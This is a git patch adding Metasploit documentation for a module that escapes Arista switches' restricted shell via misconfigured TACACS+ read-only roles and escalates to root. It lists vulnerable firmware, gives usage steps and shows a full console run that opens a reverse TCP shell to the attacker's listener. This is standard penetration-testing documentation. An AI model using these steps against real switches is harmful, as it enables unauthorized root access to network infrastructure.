From 1381eddf50ddb37cab2bc52da1f2e63df4bbbab9 Mon Sep 17 00:00:00 2001
From: ChristopherAnders <chris@securitybytes.me>
Date: Tue, 9 Jun 2020 15:49:58 -0700
Subject: [PATCH] adding arista_tacacs_shell documentation

---
 .../exploit/unix/ssh/arista_tacplus_shell.md  | 140 ++++++++++++++++++
 1 file changed, 140 insertions(+)
 create mode 100644 documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md

diff --git a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md
new file mode 100644
index 0000000000..db3afaf926
--- /dev/null
+++ b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md
@@ -0,0 +1,140 @@
+## Description
+
+  Implementing TACACS+ with Arista switch versions equal to or before 4.23.1F
+  for "Read-Only" users can circumvent using the built-in roles supplied to
+  restrict any bash  commands, leading to privilege escalation. This exploit
+  is a combination of a poorly configured TACACS+ (tac_plus) AAA server and
+  Arista’s alternative CLI shells.
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * tac_plus Version: 202001211926/PCRE/DES
+
+  Additional Vulnerable Tested Hardware/Software Combinations:
+
+  * DCS-7280SRAM-48C6-R   – 4.22.0.1F
+  * DCS-7050CX3-32S-R     – 4.20.11M
+  * DCS-7050QX-32S-R      – 4.20.9M
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/unix/arista_tacplus_shell`
+  3. `set PASSWORD <password>`
+  4. `set USERNAME <username>`
+  5. `set LHOST <lhost>`
+  6. `set RHOST <rhost>`
+  7. `check`
+  8. `run`
+  9. You should get a *root* session
+
+
+## Scenario
+```
+root@kali:~/git/metasploit-framework# ./msfconsole
+
+
+      .:okOOOkdc'           'cdkOOOko:.
+    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
+   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
+  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
+  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
+  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
+  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
+   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
+    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
+     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
+      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
+       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
+         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
+           :kk;.OOOOOOOOOOOOO.;Ok:
+             ;kOOOOOOOOOOOOOOOk:
+               ,xOOOOOOOOOOOx,
+                 .lOOOOOOOl.
+                    ,dOd,
+                      .
+
+       =[ metasploit v5.0.92-dev-5ef76ff232               ]
++ -- --=[ 2025 exploits - 1101 auxiliary - 343 post       ]
++ -- --=[ 566 payloads - 45 encoders - 10 nops            ]
++ -- --=[ 7 evasion                                       ]
+
+Metasploit tip: Display the Framework log using the log command, learn more with help log
+
+msf5 > search arista
+
+Matching Modulesf
+================
+
+   #  Name                                   Disclosure Date  Rank   Check  Description
+   -  ----                                   ---------------  ----   -----  -----------
+   0  exploit/unix/ssh/arista_tacplus_shell  2020-02-02       great  Yes    Arista restricted shell escape (with privesc)
+
+
+msf5 > use 0
+msf5 exploit(unix/ssh/arista_tacplus_shell) > show options
+
+Module options (exploit/unix/ssh/arista_tacplus_shell):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   yes       Password to login with
+   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT     22               yes       The target port
+   USERNAME                   yes       Username to login with
+
+
+Payload options (linux/x86/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0
+LHOST => 10.10.10.20
+msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10
+RHOSTS => 10.10.10.10
+msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin
+PASSWORD => admin
+msf5 exploit(unix/ssh/arista_tacplus_shell) > check
+[+] 10.10.10.10:22 - The target is vulnerable.
+msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 10.10.10.20:4444
+[*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell...
+msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established.
+[*] Requesting pty rbash
+[+] Pty successfully obtained.
+[*] Requesting a shell.
+[+] Spawned into arista rbash shell.
+[*] Attempting to break out of Arista rbash...
+[+] Escaped from rbash!
+[*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700
+msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1
+[*] Starting interaction with 1...
+bash-4.3# whoami
+whoami
+root
+bash-4.3# exit
+exit
+exit
+[*] 10.10.10.10 - Command shell session 1 closed.
+msf5 exploit(unix/ssh/arista_tacplus_shell) >
+```